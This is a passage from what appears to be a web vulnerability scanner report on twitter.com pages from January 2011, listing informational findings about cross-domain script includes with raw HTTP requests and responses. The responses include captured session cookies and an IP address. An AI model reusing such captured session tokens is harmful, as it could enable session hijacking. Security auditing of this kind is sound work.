ETag: "369af92da7b575f3f9e1aeeb54e34e15"-gzip
Last-Modified: Fri, 28 Jan 2011 14:04:16 GMT
X-Runtime: 0.01613
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 49593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296173346/javascripts/twitter.js?1296176502" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296173346/javascripts/lib/jquery.tipsy.min.js?1296176502" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296173346/javascripts/lib/gears_init.js?1296176502" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296173346/javascripts/lib/mustache.js?1296176502" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296173346/javascripts/geov1.js?1296176502" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296173346/javascripts/api.js?1296176502" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296173346/javascripts/lib/mustache.js?1296176502" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296173346/javascripts/dismissable.js?1296176502" type="text/javascript"></script>
...[SNIP]...

18.449. http://twitter.com/malsup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

18.450. http://twitter.com/malsup/favorites previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/favorites

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/favorites HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:31 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224911-48509-36720
ETag: "aa813f25e26e58a8fc00a80271530b6f"
Last-Modified: Fri, 28 Jan 2011 14:28:31 GMT
X-Runtime: 0.28607
Content-Type: text/html; charset=utf-8
Content-Length: 57347
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlOWM3MDM0NDIyYzY2M2ZkMzM0YWE1NDgwMzg1NWRh%250AM2U6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--316ed1acac7dec68e9460d11f94a8de8f6191911; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.451. http://twitter.com/malsup/favorites previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/favorites

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/favorites HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234509-89271-61168
ETag: "217a7482c44a4f0b2f81f2bfc961c91f"
Last-Modified: Fri, 28 Jan 2011 17:08:29 GMT
X-Runtime: 0.58930
Content-Type: text/html; charset=utf-8
Content-Length: 57219
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.452. http://twitter.com/malsup/lists/memberships previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/lists/memberships

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/lists/memberships HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224909-80319-15886
ETag: "c8e3bcf74656418e1966d131ca1712ec"
Last-Modified: Fri, 28 Jan 2011 14:28:29 GMT
X-Runtime: 0.29750
Content-Type: text/html; charset=utf-8
Content-Length: 53194
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlOTY3NDUzZWYzNmZkNjRmZmZhNWVmMDJlMjczNTIz%250AYWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d2b7d333c4ae3616cea1972ad8fcfbf90f4504; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.453. http://twitter.com/malsup/lists/memberships previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/lists/memberships

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/lists/memberships HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:29 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234508-466-13552
ETag: "060db64ad56aead6e4f4004301c48d79"
Last-Modified: Fri, 28 Jan 2011 17:08:28 GMT
X-Runtime: 0.52434
Content-Type: text/html; charset=utf-8
Content-Length: 53061
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.454. http://twitter.com/malsup/lists/memberships previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/lists/memberships

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/lists/memberships HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225121-12124-31617
ETag: "4763ea75ad15028df2a41e2db3e3c3af"
Last-Modified: Fri, 28 Jan 2011 14:32:01 GMT
X-Runtime: 0.21369
Content-Type: text/html; charset=utf-8
Content-Length: 53194
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlMzc5MzNmYzZkMTU5YjRmMWNmMGU2YmE0NzZiODE1%250AMDY6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a2eb394c4b1170fa994e9fcffc65e4f2665eae0d; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.455. http://twitter.com/malsup/status/28104072506638336 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28104072506638336

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/28104072506638336 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234500-586-43889
ETag: "6152ee84f48b902da1ca1248ca61a58e"
Last-Modified: Fri, 28 Jan 2011 17:08:20 GMT
X-Runtime: 0.26318
Content-Type: text/html; charset=utf-8
Content-Length: 13545
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODEwNDA3MjUwNjYzODMzNjoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--5f1833026704ac7987b23967a576a8fc84684dd1; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.456. http://twitter.com/malsup/status/28104072506638336 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28104072506638336

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
